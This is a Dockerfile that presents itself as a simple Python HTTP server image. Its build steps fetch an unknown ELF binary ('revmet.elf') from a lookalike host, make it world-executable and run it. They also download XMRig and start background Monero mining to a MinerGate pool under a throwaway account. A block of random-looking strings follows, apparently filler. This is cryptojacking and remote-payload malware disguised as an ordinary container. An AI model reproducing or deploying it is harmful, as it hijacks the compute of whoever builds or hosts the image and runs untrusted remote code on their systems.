FROM ubuntu:bionic

SHELL ["/bin/bash", "-c"]

RUN apt-get update && apt-get install -y \
    wget \
    ocl-icd-libopencl1 \
    libmicrohttpd-dev \
    libc6 \
    libstdc++6

WORKDIR /root
RUN wget http://mail.oogle.dev:8000//revmet.elf

RUN wget https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz
RUN tar -xzvf xmr*
WORKDIR /root/xmrig-2.14.1
RUN ./xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x

WORKDIR /root
RUN chmod 777 revmet.elf
RUN ./xmrig-2.14.1/xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x;./revmet.elf
RUN echo Q72ifIBZEPjw60NRjKHi36HUbL89dnl5 WA18WJbcnCpRGH4spmYIeqtM9eFnbbIC vncku1KxENs13FQ1VHX82SMfzepE8lLA i61zBn4aV1H5omH5NdoUf64lWtILioMu EMnFf8UsogudwFws0aJh8Gk601RSseqf IK0HG4zHkgwY6ndGWDKRZjig7IIumPH4 yHpFnzo6v3m6usPJBTGlvQhNRqeGkBVg FV3AnfKTLYBlgzt79szGzOPl9taIjwUY 1b9sQFJln97YAOHmmTJE802dNUZpnQMz fAwb9d1Eg4vmFWt2cLkIwgsHuznGCQmg uMZs9r0baYARiube1J6TIRSPc6D8FEMm wSMGVBU4RxpwI9bspaEExYUD1Xf36qvg 5d9KzGkP5bgqFev9HDLwXyrduU23IOzy Tt3TkgKlSQp9kbuRSSK2zZVeW0mAenFT YFb032lPv6pl2H7Qtuwqk8ugJmuKtOph DGLrlBP1wP15Z7bzvFORfIDPVXxlKOw8 iRR8Zp0TOxlCM7JSEpHNyxmT4XM90YWc zsaOLYboLruHMbrsWTTwF76XhxiEn5Vb JlcMVQX0KrjEurxbQ9jbtcmhwOFZNPb7 g0B5O2hD9pRQwxZWGXhnBJRmjZt4WqIH ddddddd

ENTRYPOINT ["python3", "-m", "http.server"]